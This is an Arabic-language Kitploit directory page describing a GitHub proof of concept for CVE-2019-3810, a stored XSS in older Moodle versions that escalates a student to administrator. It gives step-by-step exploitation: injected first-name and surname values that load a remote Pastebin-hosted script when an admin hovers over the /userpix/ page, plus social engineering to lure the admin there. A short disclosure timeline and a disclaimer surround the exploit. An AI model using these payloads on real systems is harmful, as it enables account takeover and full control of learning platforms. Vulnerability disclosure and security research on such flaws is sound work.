Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Moodle-CVE-2019-3810 — Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC لتصعيد الامتيازات (من طالب إلى أدمن) | Kitploit
أدوات/GitHubGitHub/farisv/moodle-cve-2019-3810
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubfarisv/moodle-cve-2019-3810

Moodle-CVE-2019-3810

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC لتصعيد الامتيازات (من طالب إلى أدمن)

عرض المستودع
1721منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Moodle CVE-2019-3810

Moodle (< 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16) XSS PoC لتصعيد الامتيازات (من طالب إلى مدير). هذه إحدى الثغرات السابقة التي اكتشفتها خلال اختبار اختراق سابق في مؤسسة أكاديمية. كانت ناجحة بما يكفي في ذلك الوقت لسرقة صلاحيات المدير عمليًا والحصول على تحكم كامل في Moodle باستخدام ثغرة واحدة بسيطة فقط.

يمكننا أن نرى من سجل git أن الثغرة كانت موجودة منذ الإصدارات القديمة من Moodle (2003) وتم إصلاحها فقط في 2019.

الجدول الزمني:

  • ديسمبر 2018 - تم الإبلاغ عن الثغرة إلى Moodle
  • يناير 2019 - تم إصدار التصحيح
  • أبريل 2021 - الإفصاح عن إثبات المفهوم (PoC)

تحذير

لأغراض تعليمية فقط. لا تستخدم الاستغلال في أنشطة غير قانونية. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر.

PoC

  1. ارفع payload.js إلى Pastebin أو خدمة مشابهة أخرى. غيّر قيمة userid إلى المعرف الخاص بك. لنفترض أن الرابط هو https://pastebin.com/raw/xxxxxxxx.
  2. سجّل الدخول إلى حسابك كطالب.
  3. عيّن الاسم الأول إلى " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement
  4. عيّن اللقب إلى ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS')
  5. اطلب من المدير فتح صفحة /userpix/ أو ضع رابط تلك الصفحة في منشورك وانتظر.

إذا نجحت العملية، ستتم إضافة حسابك كمدير.

فيديو توضيحي

تنزيل الأداة